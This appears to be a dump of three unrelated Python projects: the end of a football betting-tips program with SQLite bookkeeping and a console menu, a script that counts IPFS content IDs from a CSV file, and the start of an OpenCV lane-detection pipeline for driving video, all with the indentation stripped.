elif match_result == 'Draw' and rec_bet == 'Avoid':
main_cur.execute("UPDATE match_analysis SET bet_result = 'Avoided' WHERE fid = ?", (fid,))
main_conn.commit()
else:
print('There was an error processing the bet result', fid, rec_bet, match_result)
continue
def test_bet_result():
"""Calculate the result of the test bet"""
main_cur.execute("SELECT fid, TEST_rec_bet, match_result FROM match_analysis WHERE TEST_bet_result "
"ISNULL AND match_result IS NOT NULL")
data = main_cur.fetchall()
for fid, Test_rec_bet, match_result in data:
if match_result == 'Home Win' and (Test_rec_bet == '1' or Test_rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (Test_rec_bet == '2' or Test_rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (Test_rec_bet == '1x' or Test_rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Home Win' and (Test_rec_bet == '2' or Test_rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (Test_rec_bet == '1' or Test_rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (Test_rec_bet == '1' or Test_rec_bet == '2'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
else:
print('There was an error processing the bet result', fid, Test_rec_bet, match_result)
continue
def view_match_results_5days():
"""View match results for the last 5 days"""
main_cur.execute("select match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec, match_result, bet_result from match_analysis "
"where match_datetime between datetime('now', '-5 days') and datetime('now') "
"and bet_result is not null ORDER BY match_datetime DESC")
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec, mr, br in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " + rec_bet
+ " | " + str(round(percentage_rec, 2)) + " | " + mr + " | " + br)
# ------------------------------------Match Archive-----------------------------------------
def match_archive_insert():
"""Insert completed matches into the match archive"""
main_cur.execute('INSERT OR IGNORE INTO match_archive(match_datetime, country_name, league_name, '
'country_league_name, home_team_name, home_team_id, away_team_name, away_team_ID, home_win, '
'home_draw, away_draw, away_win, home_position, away_position, total_clubs, home_matches_played, '
'away_matches_played, home_matches_won, away_matches_won, home_matches_draw, away_matches_draw, '
'home_matches_loss, away_matches_loss, home_goal_diff, away_goal_diff, home_team_form, '
'away_team_form, home_team_name_rank, away_team_name_rank, home_position_rank, away_position_rank,'
' home_form_rank, away_form_rank, home_gd_rank, away_gd_rank, home_points_total, '
'away_points_total, rec_bet, percentage_chance, percentage_rec, match_result, bet_result, '
'TEST_rec_bet, TEST_bet_result, match_url, league_url, league_winperc, single_chnc_margin, '
'double_chnc_margin, pos_weighting, team_name_weighting, form_weighting, gd_weighting, '
'pos_winrate, team_name_winrate, form_winrate, gd_winrate) '
'SELECT match_datetime, match_analysis.country_name, match_analysis.league_name, '
'match_analysis.country_league_name, home_team_name, home_team_id, away_team_name, away_team_ID, '
'home_win, home_draw, away_draw, away_win, home_position, away_position, total_clubs, '
'home_matches_played, away_matches_played, home_matches_won, away_matches_won, home_matches_draw, '
'away_matches_draw, home_matches_loss, away_matches_loss, home_goal_diff, away_goal_diff, '
'home_team_form, away_team_form, home_team_name_rank, away_team_name_rank, home_position_rank, '
'away_position_rank, home_form_rank, away_form_rank, home_gd_rank, away_gd_rank, home_points_total,'
' away_points_total, rec_bet, percentage_chance, percentage_rec, match_result, bet_result, '
'TEST_rec_bet, TEST_bet_result, match_url, league_url, league_winperc, single_chnc_margin, '
'double_chnc_margin, pos_weighting, team_name_weighting, form_weighting, gd_weighting, '
'pos_winrate, team_name_winrate, form_winrate, gd_winrate '
'FROM main.match_analysis INNER JOIN main.leagues '
'ON match_analysis.league_name = leagues.league_name WHERE TEST_bet_result is not null '
'AND bet_result is not null')
main_conn.commit()
# ------------------------------------Utility-----------------------------------------------
def backup_database():
"""Creates a backup for the main database"""
print("Creating a restore point")
datetime_now = datetime.datetime.now()
datetimestamp = str(datetime_now.year) + '_' + str(datetime_now.month) + '_' + str(datetime_now.day) + '_' + \
str(datetime_now.hour) + str(datetime_now.minute) + str(datetime_now.second)
copy2('main.db', 'databackup/archive_' + str(datetimestamp) + '.db')
def delete_oldest_database():
"""Deletes oldest database if the backup limit exceeds 30"""
database_list = os.listdir('databackup')
if len(database_list) > 10:
os.remove('databackup/' + database_list[0])
else:
pass
def backup_restore():
"""Restore backup from archives"""
while True:
file_list = sorted(os.listdir('databackup'))[::-1]
index = 0
print('The following backup files are available:')
print(' ')
for file in file_list:
index += 1
print(str(index) + '.', file)
print(' ')
try:
usr_prompt = int(input('Type the number corresponding with the backupfile you want to restore: ')) - 1
copy2('databackup/' + file_list[usr_prompt], 'main.db')
print(' ')
print('Restored', file_list[usr_prompt], 'to main.db')
divider()
break
except:
pass
print("please enter an option listed above")
divider()
def country_league_combine():
"""ccc"""
main_cur.execute("Select fid, country_name, league_name from match_archive")
data = main_cur.fetchall()
for fid, cn, ln in data:
cnc = str(cn).capitalize()
country_league_name = cnc + ' ' + ln
main_cur.execute("UPDATE match_archive SET country_league_name = ?, country_name = ? WHERE fid = ?",
(country_league_name, cnc, fid))
main_conn.commit()
def match_datetimeupdate():
"""Update match date time"""
main_cur.execute("SELECT match_datetime, fid from match_analysis")
data = main_cur.fetchall()
for ma, fid in data:
try:
split_datetime = ma.split(' ')
match_time = split_datetime[1]
split_date = split_datetime[0].split(':')
datetime_correct = split_date[0] + '-' + split_date[1] + '-' + split_date[2] + ' ' + match_time
main_cur.execute("UPDATE match_analysis SET match_datetime = ? WHERE fid = ?", (datetime_correct, fid))
main_conn.commit()
except:
split_datetime = ma.split(' ')
match_time = split_datetime[1] + ":00"
datetime_correct = split_datetime[0] + ' ' + match_time
main_cur.execute("UPDATE match_analysis SET match_datetime = ? WHERE fid = ?", (datetime_correct, fid))
main_conn.commit()
def divider():
"""Aesthetic divider"""
print('''
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
''')
# ------------------------------------Statistics------------------------------------------
def winrate_stats(league_names):
"""Show the program winrates and league winrates"""
print("Winrates for leagues are: ")
leagues_scanned = 0
league_winadds = 0
for country_league_name in league_names:
main_cur.execute("SELECT bet_result from match_archive WHERE country_league_name = ? "
"AND bet_result IS NOT NULL AND rec_bet <> 'Avoid'", country_league_name)
data = main_cur.fetchall()
if len(data) < 1:
league_winrate = 'There are no completed matches for this league in the database'
print(country_league_name[0], ":", league_winrate)
else:
won = 0
lost = 0
total_played = 0
for bet_result in data:
if bet_result[0] == 'Won':
won += 1
total_played += 1
elif bet_result[0] == 'Lost':
lost += 1
total_played += 1
else:
continue
league_winrate = floor((won / total_played) * 100)
print(country_league_name[0], ":", league_winrate)
league_winadds += int(league_winrate)
leagues_scanned += 1
program_winrate = league_winadds / leagues_scanned
print(" ")
print("Program winrate:", round(program_winrate, 2))
def odds_winrate():
"""Determine the winrate of lower odds"""
main_cur.execute("SELECT home_win, away_win, match_result from match_archive")
data = main_cur.fetchall()
win_0_5 = 0
win_1 = 0
win_1_5 = 0
win_2 = 0
win_2_5 = 0
win_3 = 0
win_more_3 = 0
loss_0_5 = 0
loss_1 = 0
loss_1_5 = 0
loss_2 = 0
loss_2_5 = 0
loss_3 = 0
loss_more_3 = 0
for home_win, away_win, match_result in data:
odds_diff = home_win - away_win
if odds_diff >= 0:
if 0.5 >= odds_diff >= 0:
if match_result == 'Home Win':
win_0_5 += 1
elif match_result == 'Draw':
win_0_5 += 1
elif match_result == 'Away Win':
loss_0_5 += 1
else:
print('Error')
break
elif 1 >= odds_diff > 0.5:
if match_result == 'Home Win':
win_1 += 1
elif match_result == 'Draw':
win_1 += 1
elif match_result == 'Away Win':
loss_1 += 1
else:
print('Error')
break
elif 1.5 >= odds_diff > 1:
if match_result == 'Home Win':
win_1_5 += 1
elif match_result == 'Draw':
win_1_5 += 1
elif match_result == 'Away Win':
loss_1_5 += 1
else:
print('Error')
break
elif 2 >= odds_diff > 1.5:
if match_result == 'Home Win':
win_2 += 1
elif match_result == 'Draw':
win_2 += 1
elif match_result == 'Away Win':
loss_2 += 1
else:
print('Error')
break
elif 2.5 >= odds_diff > 2:
if match_result == 'Home Win':
win_2_5 += 1
elif match_result == 'Draw':
win_2_5 += 1
elif match_result == 'Away Win':
loss_2_5 += 1
else:
print('Error')
break
elif 3 >= odds_diff > 2.5:
if match_result == 'Home Win':
win_3 += 1
elif match_result == 'Draw':
win_3 += 1
elif match_result == 'Away Win':
loss_3 += 1
else:
print('Error')
break
elif odds_diff > 3:
if match_result == 'Home Win':
win_more_3 += 1
elif match_result == 'Draw':
win_more_3 += 1
elif match_result == 'Away Win':
loss_more_3 += 1
else:
print('Error')
break
else:
print('Error')
break
elif odds_diff < 0:
odds_diff = abs(odds_diff)
if 0.5 >= odds_diff >= 0:
if match_result == 'Away Win':
win_0_5 += 1
elif match_result == 'Draw':
win_0_5 += 1
elif match_result == 'Home Win':
loss_0_5 += 1
else:
print('Error')
break
elif 1 >= odds_diff > 0.5:
if match_result == 'Away Win':
win_1 += 1
elif match_result == 'Draw':
win_1 += 1
elif match_result == 'Home Win':
loss_1 += 1
else:
print('Error')
break
elif 1.5 >= odds_diff > 1:
if match_result == 'Away Win':
win_1_5 += 1
elif match_result == 'Draw':
win_1_5 += 1
elif match_result == 'Home Win':
loss_1_5 += 1
else:
print('Error')
break
elif 2 >= odds_diff > 1.5:
if match_result == 'Away Win':
win_2 += 1
elif match_result == 'Draw':
win_2 += 1
elif match_result == 'Home Win':
loss_2 += 1
else:
print('Error')
break
elif 2.5 >= odds_diff > 2:
if match_result == 'Away Win':
win_2_5 += 1
elif match_result == 'Draw':
win_2_5 += 1
elif match_result == 'Home Win':
loss_2_5 += 1
else:
print('Error')
break
elif 3 >= odds_diff > 2.5:
if match_result == 'Away Win':
win_3 += 1
elif match_result == 'Draw':
win_3 += 1
elif match_result == 'Home Win':
loss_3 += 1
else:
print('Error')
break
elif odds_diff > 3:
if match_result == 'Away Win':
win_more_3 += 1
elif match_result == 'Draw':
win_more_3 += 1
elif match_result == 'Home Win':
loss_more_3 += 1
else:
print('Error')
break
else:
print('Error')
break
else:
print('Error')
break
winrate_0_5 = (win_0_5 / (win_0_5 + loss_0_5)) * 100
winrate_1 = (win_1 / (win_1 + loss_1)) * 100
winrate_1_5 = (win_1_5 / (win_1_5 + loss_1_5)) * 100
winrate_2 = (win_2 / (win_2 + loss_2)) * 100
winrate_2_5 = (win_2_5 / (win_2_5 + loss_2_5)) * 100
winrate_3 = (win_3 / (win_3 + loss_3)) * 100
winrate_more_3 = (win_more_3 / (win_more_3 + loss_more_3)) * 100
winrate_odds_all = (winrate_0_5 + winrate_1 + winrate_1_5 + winrate_2 + winrate_2_5 + winrate_3 + winrate_more_3)/7
print("Odds winrates are as follows:")
print("Odd difference ranges 0.5 or less:", round(winrate_0_5, 2))
print("Odd difference ranges 0.6 to 1.0:", round(winrate_1, 2))
print("Odd difference is ranges 1.1 and 1.5:", round(winrate_1_5, 2))
print("Odd difference is ranges 1.6 and 2.0:", round(winrate_2, 2))
print("Odd difference is ranges 2.1 and 2.5:", round(winrate_2_5, 2))
print("Odd difference is ranges 2.6 and 3.0:", round(winrate_3, 2))
print("Odd difference is greater than 3.0:", round(winrate_more_3, 2))
print(" ")
print("Average Odd Difference winrate:", winrate_odds_all)
# ------------------------------------Third level------------------------------------------
def sys_boot():
"""Run at startup"""
main_db_check()
# archive_db_check()
db_table_check()
def leagues_sect():
"""Adjust and view leagues in the database"""
divider()
while True:
print('''Edit Leagues:
What would you like to do?
1. View Leagues
2. Add Leagues
3. Remove Leagues
4. Return
''')
user_prompt = int(input("Selection: "))
if user_prompt == 1:
divider()
leagues_display()
divider()
elif user_prompt == 2:
while True:
divider()
league_update_add()
divider()
user_prompt = input("Would you like to add more leagues? Enter Y/y or N/n: ")
if user_prompt.lower() == 'y':
continue
elif user_prompt.lower() == 'n':
break
else:
pass
print("Please enter Y/N")
divider()
elif user_prompt == 3:
while True:
divider()
leagues_display()
divider()
main_cur.execute("SELECT country_name, league_name FROM leagues")
league_check = main_cur.fetchone()
if league_check is None:
break
else:
league_update_delete()
user_prompt = input("Would you like to delete more leagues? Enter Y/y or N/n: ")
if user_prompt.lower() == 'y':
continue
elif user_prompt.lower() == 'n':
break
else:
pass
print("Please enter Y/N")
divider()
elif user_prompt == 4:
break
else:
pass
print("please enter an option listed above")
divider()
def tips_sect():
"""Scrape and gather match data, then present the best tips"""
while True:
usr_input = input("Enter your maximum required accumulator: ")
try:
acca_limit = int(usr_input)
break
except:
print('----------------------------------------------')
print('Error! Please enter a number when prompted')
print('----------------------------------------------')
pass
print('''Fetching Tips. Please be patient...
''')
# Program Runtime
start_time = time.time()
# Create and manage restore points
backup_database()
delete_oldest_database()
# Collect match and bet results
match_results()
bet_result()
test_bet_result()
match_archive_insert()
# Delete databases over 3 months old and upcoming matches that haven't been played yet
analysis_delete_3month()
analysis_delete_upcoming()
# Delete data in match table and collect new match information
match_data_delete()
match_info(match_list_create(leagues_url_return()))
league_table_delete()
league_data_home(leagues_url_return())
league_data_away(leagues_url_return())
uefa_ranking_delete()
uefa_team_ranking()
league_winmargin(league_names_return())
league_winrate(league_names_return())
print("Updated league win rates and margins")
position_ranking_winrate(league_names_return())
team_name_ranking_winrate(league_names_return())
form_ranking_winrate(league_names_return())
gd_ranking_winrate(league_names_return())
print("Updated variable winrates")
pos_weighting_calc(league_names_return())
team_name_weighting_calc(league_names_return())
form_weighting_calc(league_names_return())
gd_weighting_calc(league_names_return())
print("Updated variable weightings")
analysis_insert()
team_ranking_calc_home()
team_ranking_calc_away()
form_ranking_calc()
league_position_ranking_calc()
goal_difference_ranking_calc()
generate_point_totals()
percentage_rec_calc()
print("Matches analysed")
divider()
print("Your recommended bets are:"
" ")
ticket_generation(acca_limit, odds_list())
print(" ")
print("--- Runtime: %s minutes ---" % ((time.time() - start_time) / 60))
def results_sect():
"""View recent results"""
print("Fetching match result..."
" ")
match_results()
print('Match results collected')
print('Processing bet results')
bet_result()
test_bet_result()
match_archive_insert()
view_match_results_5days()
def statistics_sect():
"""View statistics"""
while True:
user_prompt = int(input('''Which statistic would you like to see?:
1. See program and league winrates
2. Odds difference winrates
3. Return
Selection: '''))
if user_prompt == 1:
divider()
winrate_stats(league_names_return())
divider()
elif user_prompt == 2:
divider()
odds_winrate()
divider()
elif user_prompt == 3:
break
else:
print("please enter an option listed above")
divider()
# -------------------------------------Program--------------------------------------------------------------------------
def betterodds():
"""Betting Tips Program"""
sys_boot()
time.sleep(2)
divider()
# Welcome message
print("Thank you for using this program. If you have any questions regarding the use of this program please contact"
" Jinx13 at <EMAIL>")
divider()
time.sleep(2)
while True:
user_prompt = int(input('''Hi! Please enter the number corresponding the selection you would like to make
1. Get tips now!
2. View Match Results
3. Edit Leagues
4. See Statistics
5. Restore Database
6. Exit Program
Selection: '''))
if user_prompt == 1:
divider()
tips_sect()
divider()
elif user_prompt == 2:
divider()
results_sect()
divider()
elif user_prompt == 3:
leagues_sect()
divider()
elif user_prompt == 4:
divider()
statistics_sect()
divider()
elif user_prompt == 5:
divider()
backup_restore()
divider()
elif user_prompt == 6:
divider()
print('Exiting Program...Goodbye')
driver.quit()
break
else:
pass
print("please enter an option listed above")
betterodds()
# TODO create database most recent date feature
# TODO Create split between ticket display and retrieval
# TODO handle entry of league that is already in the database
# TODO handle match data collection with no leagues
``` |
{
"source": "jinxankit/scripts",
"score": 3
} |
#### File: jinxankit/scripts/main.py
```python
import ipfshttpclient
import csv
def csv1():
with open('output.csv', 'rt') as f:
data = csv.reader(f)
cid_set = set()
cid_dict = {}
for row in data:
cid_list, cids_dict = per_string(cid_set, cid_dict, row[0])
# print(len(cid_list), cid_list)
cids_dict = dict(sorted(cids_dict.items(), key=lambda x: x[1], reverse=True))
print(len(cids_dict), cids_dict)
with open('cids.txt', 'w') as f:
for item in cid_list:
f.write("%s\n" % item)
with open('dict.csv', 'w') as csv_file:
writer = csv.writer(csv_file)
for key, value in cids_dict.items():
if key != '':
writer.writerow([key, value])
def per_string(cid_set, cid_dict, uri):
try:
cid = uri[:]
qm_index = cid.find('Qm')
unique_cid = cid[qm_index:qm_index+46].strip()
cid_set.add(unique_cid)
if unique_cid in cid_dict:
cid_dict[unique_cid] += 1
else:
cid_dict[unique_cid] = 1
return cid_set, cid_dict
except Exception as e:
print(e)
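# Hedged usage sketch for per_string(): the URI below is made up (not a row from
# output.csv). A CIDv0 is 'Qm' followed by 44 more base58 characters (46 in total),
# which matches the 46-character slice taken above. This helper is illustrative only
# and is not called anywhere in this script.
def _example_per_string():
    sample_uri = 'https://ipfs.io/ipfs/Qm' + 'a' * 44 + '/file.png'
    cids, counts = per_string(set(), {}, sample_uri)
    return cids, counts  # ({'Qmaaa...'}, {'Qmaaa...': 1})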
def print_hi(name):
# Use a breakpoint in the code line below to debug your script.
print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
print_hi('PyCharm')
csv1()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
``` |
{
"source": "jinxed9/SCEP2",
"score": 3
} |
#### File: jinxed9/SCEP2/main.py
```python
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import os
import glob
from PIL import Image, ImageDraw, ImageFont
from render import renderVideoFFMPEG
from calibration import doCalibration
def warp(img):
#Define calibration box in source (original) and destination (desired or warped) coordinates
img_size = (img.shape[1], img.shape[0])
#Four source coordinates
src = np.float32(
[[200, 675],
[1100, 675],
[700, 450],
[580, 450]]
)
#Four desired coordinates
dst = np.float32(
[[200, 675],
[1100, 675],
[1100, 0],
[200, 0]]
)
# Compute the perspective transform, M
M = cv2.getPerspectiveTransform(src, dst)
# Create warped image - uses linear interpolation
warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)
return warped
def unwarp(img):
#Define calibration box in source (original) and destination (desired or warped) coordinates
img_size = (img.shape[1], img.shape[0])
#Four source coordinates
src = np.float32(
[[200, 675],
[1100, 675],
[700, 450],
[580, 450]]
)
#Four desired coordinates
dst = np.float32(
[[200, 675],
[1100, 675],
[1100, 0],
[200, 0]]
)
# Could compute the inverse also by swapping the input parameters
Minv = cv2.getPerspectiveTransform(dst, src)
# Create warped image - uses linear interpolation
unwarped = cv2.warpPerspective(img, Minv, img_size, flags=cv2.INTER_LINEAR)
return unwarped
#------------- Video Processing ----------------------------
def getFrame(frame):
vidcap = cv2.VideoCapture('project_video.mp4')
ret, image = vidcap.read()
count = 0
while ret:
ret,image = vidcap.read()
print('Read a new frame: ', ret)
count += 1
print(count)
if count == frame:
cv2.imwrite("frame%d.jpg" % count, image)
break
#----------------- Begin Gradient -----------------------
def mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):
# Convert to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Take both Sobel x and y gradients
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)
# Calculate the gradient magnitude
gradmag = np.sqrt(sobelx**2 + sobely**2)
# Rescale to 8 bit
scale_factor = np.max(gradmag)/255
gradmag = (gradmag/scale_factor).astype(np.uint8)
# Create a binary image of ones where threshold is met, zeros otherwise
binary_output = np.zeros_like(gradmag)
binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1
# Return the binary image
return binary_output
#----------------- Thresholding -----------------------------------
def doThresholding(img):
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
# Convert to grayscale
gray =cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Sobel X
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)# Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
thresh_min = 20
thresh_max = 100
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
# Threshold color channel
s_thresh_min = 170
s_thresh_max = 255
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
# Plotting thresholded images
#f, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10))
#ax1.set_title('Stacked thresholds')
#ax1.imshow(color_binary)
#ax2.set_title('Combined S channel and gradient thresholds')
#ax2.imshow(combined_binary, cmap='gray')
#plt.show()
return combined_binary
#------------------ Histogram -------------------
def hist(img):
# Grab only the bottom half of the image
# Lane lines are likely to be mostly vertical nearest to the car
bottom_half = img[img.shape[0]//2:,:]
# Sum across image pixels vertically - make sure to set an `axis`
# i.e. the highest areas of vertical lines should be larger values
histogram = np.sum(bottom_half, axis=0)
return histogram
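# Hedged sketch of how the histogram above is used: the peak in each half of the
# bottom-half histogram gives the starting x position of one lane line. This mirrors
# the first few lines of find_lane_pixels() below; the helper itself is illustrative
# and is not called anywhere in this script.
def _example_lane_bases(binary_warped):
    histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)
    midpoint = histogram.shape[0] // 2
    leftx_base = np.argmax(histogram[:midpoint])              # left lane seed
    rightx_base = np.argmax(histogram[midpoint:]) + midpoint  # right lane seed
    return leftx_base, rightx_base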
#-------- Sliding Window ------------------------
def find_lane_pixels(binary_warped):
# Take a histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0]//2:,:], axis=0)
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped))
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# HYPERPARAMETERS
# Choose the number of sliding windows
nwindows = 9
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Set height of windows - based on nwindows above and image shape
window_height = int(binary_warped.shape[0]//nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated later for each window in nwindows
leftx_current = leftx_base
rightx_current = rightx_base
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window+1)*window_height
win_y_high = binary_warped.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img,(win_xleft_low,win_y_low),
(win_xleft_high,win_y_high),(0,255,0), 2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),
(win_xright_high,win_y_high),(0,255,0), 2)
# Identify the nonzero pixels in x and y within the window #
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices (previously was a list of lists of pixels)
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
# Avoids an error if the above is not implemented fully
pass
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty, out_img
def measure_curvature_pixels(ploty, left_fit, right_fit):
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
return left_curverad, right_curverad
def measure_curvature_real(ploty, left_fit_cr, right_fit_cr):
'''
Calculates the curvature of polynomial functions in meters.
'''
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/700 # meters per pixel in x dimension
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
return left_curverad, right_curverad
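# Worked form of the curvature calculation used above: for a lane modelled as
#     x = A*y**2 + B*y + C
# the radius of curvature at a given y is
#     R(y) = (1 + (2*A*y + B)**2) ** 1.5 / abs(2 * A)
# which is exactly what both functions above compute. Hedged caveat: for a radius
# genuinely in metres, A and B should come from a polyfit on points already scaled by
# xm_per_pix / ym_per_pix; scaling only y_eval, as above (with the pixel-space fit
# passed in at the call site), is an approximation.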
def fit_polynomial(binary_warped, print_stages=False):
# Find our lane pixels first
leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)
# Fit a second order polynomial to each using `np.polyfit`
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
# Avoids an error if `left` and `right_fit` are still none or incorrect
print('The function failed to fit a line!')
left_fitx = 1*ploty**2 + 1*ploty
right_fitx = 1*ploty**2 + 1*ploty
## Visualization ##
# Colors in the left and right lane regions
out_img[lefty, leftx] = [255, 0, 0]
out_img[righty, rightx] = [0, 0, 255]
left_fitx_int = np.around(left_fitx)
left_fitx_int = left_fitx_int.astype(int)
right_fitx_int = np.around(right_fitx)
right_fitx_int = right_fitx_int.astype(int)
ploty_int = ploty.astype(int)
lines = np.zeros_like(out_img)
pts_left = np.vstack((left_fitx_int,ploty_int)).T
pts_right = np.vstack((right_fitx_int, ploty_int)).T
pts = np.append(pts_left, np.flip(pts_right, axis=0), axis=0)
# Draw the lane onto the warped blank image
cv2.fillPoly(lines, np.int_([pts]), (0,255, 0))
cv2.polylines(lines, np.int_([pts_left]), False, (255, 0, 0), thickness=30)
cv2.polylines(lines, np.int_([pts_right]), False, (0, 0, 255), thickness=30)
#plt.imshow(lines)
#plt.show()
if print_stages:
# Plots the left and right polynomials on the lane lines
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
cv2.polylines(out_img, np.int_([pts_left]), False, (255, 255, 0), thickness=10)
cv2.polylines(out_img, np.int_([pts_right]), False, (255, 255, 0), thickness=10)
plt.imsave(".\\output_images\\test%d_top_down.jpg" % count,out_img,cmap='gray')
# Calculation of vehicle position
xm_per_pix = 3.7/700 # meters per pixel in x dimension
left_lane = left_fitx_int[719]
right_lane = right_fitx_int[719]
center = 1280/2
lane_position = (right_lane+left_lane)/2
vehicle_position = (lane_position-center) * xm_per_pix
#left_curverad, right_curverad = measure_curvature_pixels(ploty,left_fit, right_fit)
left_curverad, right_curverad = measure_curvature_real(ploty, left_fit, right_fit)
#print(left_curverad, right_curverad)
radius = (left_curverad+right_curverad)/2
return lines, radius, vehicle_position
#----------------Do Lane Detection --------------
def doLaneDetection(img,print_stages=False):
#TODO: make sure this works on white lanes
# Thresholding
color_binary = doThresholding(img)
if print_stages:
plt.imsave(".\\output_images\\test%d_color_binary.jpg" % count,color_binary,cmap='gray')
# Perspective Transform
top_down = warp(color_binary)
#TODO: Add sliding window
#TODO: Add low pass filter
# Fit a Polynomial
out_img, radius, position = fit_polynomial(top_down, print_stages)
# Reverse Perspective Transform
